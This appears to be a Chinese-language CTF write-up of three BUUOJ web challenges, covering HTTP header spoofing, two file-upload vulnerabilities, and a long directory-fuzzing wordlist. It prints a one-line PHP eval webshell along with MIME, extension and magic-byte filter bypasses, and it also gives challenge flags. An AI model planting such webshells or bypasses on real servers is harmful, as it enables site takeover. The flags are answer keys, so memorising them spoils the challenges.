[极客大挑战 2019]Http、[极客大挑战 2019]Upload、[ACTF2020 新生赛]Upload

[ 极客大挑战 2019]Http

打开题目

没发现有用的信息,查看源代码

发现文件:Secret.php

直接去访问

根据提示修改Referer,直接抓包,添加字段

复制代码
Referer:https://www.Sycsecret.com
复制代码
Referer:https://Sycsecret.buuoj.cn

修改User-Agent

复制代码
User-Agent: Syclover/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0

修改X-Forwarded-For

复制代码
X-Forwarded-For:127.0.0.1

发现flag:flag{46c7c3e4-f60c-46fb-a985-4a10c8a5eb06}

[ 极客大挑战 2019]Upload

打开题目

是一个上传文件的网页,文件上传漏洞,上传一句话木马,并抓包

提示不是图片,我们修改数据

复制代码
Content-Type: image/jpeg

提示不能是php,对文件后缀名也进行了识别,那我们换了一种木马,那个木马类型是不是一段js代码,所以我们要想到什么文件能执行js代码,html,phtml,asp,jsp。那就改一下后缀名看看

因为html蚁剑连不上,尝试phtml文件

发现也可以

提示不能有**'<?'**,我们的文件开头加上"GIF89a?",来骗一波服务器

复制代码
GIF89a? <script language="php">eval($_REQUEST['rc'])</script>

上传成功,但是好像不知道路径,使用FUZZ测试

采用以下字典

复制代码
.viminfo

.bash_history

.bashrc

robots

README.md

crossdomain.xml

.git

.git/HEAD

.git/index

.git/config

.git/description

source

.source

README.MD

README

.gitignore

.svn

.svn/wc.db

.svn/entries

user

.hg

.DS_store

WEB-INF/web.xml

WEB-INF/src/

WEB-INF/classes

WEB-INF/lib

WEB-INF/database.propertie

CVS/Root

CVS/Entries

.bzr/

%3f

%3f~

.%3f

.%3f.swo

.%3f.swn

.%3f.swm

.%3f.swl

_viminfo

%3f~1~

%3f~2~

%3f~3~

%3f.save

%3f.save1

%3f.save2

%3f.save3

%3f_Edietplus

phpinfo

.htaccess

.svn/

.git/

.index

index

.index~

index_Edietplus

index.~

index.~1~

index~

login

register

test

upload

t

www

www.tar

web

web.tar

plus

qq

log

wwwroot

dede

admin

edit

Fckeditor

ewebeditor

bbs

Editor

manage

shopadmin

web_Fckeditor

webadmin

admin/WebEditor

admin/daili/webedit

login/

database/

tmp/

manager/

manage/

web/

admin/

shopadmin/

wp-includes/

edit/

editor/

user/

users/

home/

test/

administrator/

houtai/

backdoor/

flag/

upload/

uploads/

download/

downloads/

root

backup

.ds_store

flag

fl4g

f1ag

f14g

4dmin

adm1n

4dm1n

admin1

admin2

adminlogin

administrator

home

logs

config

member

users

info

backdoor

fm

example

mysql

a

b

c

d

db

bdb

ddb

dump

data

backup.gz

backup.bz2

rss.xml

1

2

3

123

111

222

/wp-config

/configuration

/sites/default/settings

/config

/conf/_basic_config

/config/site

/system/config/default

/framework/conf/config

/mysite/_config

/typo3conf/localconf

/config/config_global

/config/config_ucenter

/lib

/data/config

/includes/config

/data/common

/caches/configs/database

/caches/configs/system

/include/config

/phpsso_server/caches/configs/database

/phpsso_server/caches/configs/system

404

index.html

phpmyadmin/

phpMyAdmin/

.DS_Store

.idea/workspace.xml

project

common

db_mysql

install

conf

setup

init

php

http

core

ftp

database

Database

BookStore

DB

schema

update

sql

all

passwd

init_db

fckstyles

Config

build

ini

sample

settings

setting

Php

nginx

httpd

local

LICENSE

sitemap

username

pass

password

app

CHANGELOG

INSTALL

error

phpMyAdmin

pma

pmd

SiteServer

Admin/

manager

manage/html

resin-admin

resin-doc

axis2-admin

admin-console

system

wp-admin

uc_server

debug

Conf

webmail

service

memadmin

owa

harbor

master

xmlrpc

search

l

forum

p

cmd

shell

portal

blog

webapp

webapps

plugins

cgi-bin

htdocs

wsdl

html

tmp

file

solr

WEB-INF

zabbix

ckeditor

FCKeditor

editor

DataBackup

api

inc

default

2008

2020

2019

2018

2017

2020

2021

2022

备份

最新备份

新建文件

新建文件夹

新建文本

密码

新的

网站

bak

new

back

yuanma

源码

old

beifen

发现/upload目录,去访问

找到我们上传的文件了,去蚁剑访问

http://6d3e2b42-e362-479c-9de6-647312847844.node5.buuoj.cn/upload/muma.phtml

去根目录里找flag

发现flag:flag{76149781-a5f9-4174-8192-dcd365e8060f}

[ACTF2020 新生赛 ]Upload

打开题目

直接上传文件

发现前端有拦截,查看一下源代码

发现有onsubmit标签,删掉这个标签,再次上传

发现还是不行,把后缀改为.phtml

发现成功上传,使用蚁剑连接

访问根目录

发现flag:flag{d50e433a-aece-4bf5-8c8e-08c85d8d8880}

相关推荐
IpdataCloud1 小时前
直播打赏异常排查:大额打赏IP来自高风险地区?用IP查询定位触发人工审核
网络·tcp/ip·网络安全·ip
山川绿水1 小时前
bugku——MISC——键盘
安全·网络安全·系统安全·密码学
向往着的青绿色2 小时前
雷池(SafeLine)社区版免费部署教程|从环境检查到防护实操全流程
网络·计算机网络·nginx·网络安全·容器·网络攻击模型·信息与通信
波兰的蓝3 小时前
CVE-2016-4437 Apache Shiro反序列化漏洞复现
web安全·网络安全
2401_865382504 小时前
GB/T22240-2020《信息安全技术 网络安全等级保护定级指南》标准解读
网络安全·信息安全·等保测评·标准·信息化项目
努力的lpp4 小时前
小迪安全课程第一节复习笔记
网络安全
free_735 小时前
超越“回答”,AI Agent迎来全链路安全治理挑战
人工智能·python·网络安全
努力的lpp5 小时前
小迪安全课程第二节复习笔记
网络安全
谪星·阿凯6 小时前
从入门到拿Flag:XXE漏洞全解析
安全·web安全·网络安全
乾元7 小时前
全球治理: 从《AI 法案》看安全合规的国际趋势
网络·人工智能·安全·机器学习·网络安全·架构·安全架构